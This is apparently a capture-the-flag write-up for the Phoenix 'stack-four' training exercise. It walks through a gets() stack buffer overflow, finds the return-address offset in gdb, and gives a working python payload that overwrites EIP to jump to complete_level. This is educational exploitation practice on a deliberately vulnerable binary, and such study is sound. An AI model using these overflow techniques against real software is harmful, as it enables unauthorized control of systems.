Stack 4
Write-up for: Stack Four
The goal is to redirect execution to complete_level by overflowing the saved instruction pointer.
Analyzing the binary / source reveals a stack buffer overflow in the start_level function.
char buffer[64];
void *ret;
gets(buffer);
This means by providing a buffer larger than 64 bytes, we can overflow the saved instruction pointer. The question is, where exactly is it relative to the buffer?
To find this out we run the binary with gdb, feed it exactly 64 bytes of input data, and look at the stack at the end of complete_level.
python -c 'print "A"*64' > ~/64_bytes
gdb stack-four
break *start_level+46
r < ~/64_bytes
x/x32w $esp
0xffffd5a0: 0xf7ffb1e0 0xffffd5bf 0x00000001 0x41414141
0xffffd5b0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd5c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd5d0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd5e0: 0x41414141 0x41414141 0x41414141 0x0804855c
0xffffd5f0: 0x08048610 0x00000000 0xffffd608 0x0804855c
0xffffd600: 0x00000000 0xffffd620 0xffffd69c 0xf7f8f654
0xffffd610: 0xffffd694 0x00000001 0xffffd69c 0xf7f8f654
As we can see, right after our buffer is the local variable retwhich contains the return address 0x0804855c which we also see one row below. This means the stored instruction pointer is at offfset sizeof(buffer) + 16.
After getting the address of complete_level via objdump, exploitation is trivial.
ser@phoenix-amd64:/opt/phoenix/i486$ objdump -t stack-four | grep complete_level
080484e5 g F .text 00000020 complete_level
Exploit
- Overflow buffer
- add 16 bytes of padding
- Overwrite EIP with address of complete_level
user@phoenix-amd64:/opt/phoenix/i486$ python -c 'print "A"*64+ "B"*16+"\x08\x04\x84\xe5"[::-1]' | ./stack-four
Welcome to phoenix/stack-four, brought to you by https://exploit.education
and will be returning to 0x80484e5
Congratulations, you've finished phoenix/stack-four :-) Well done!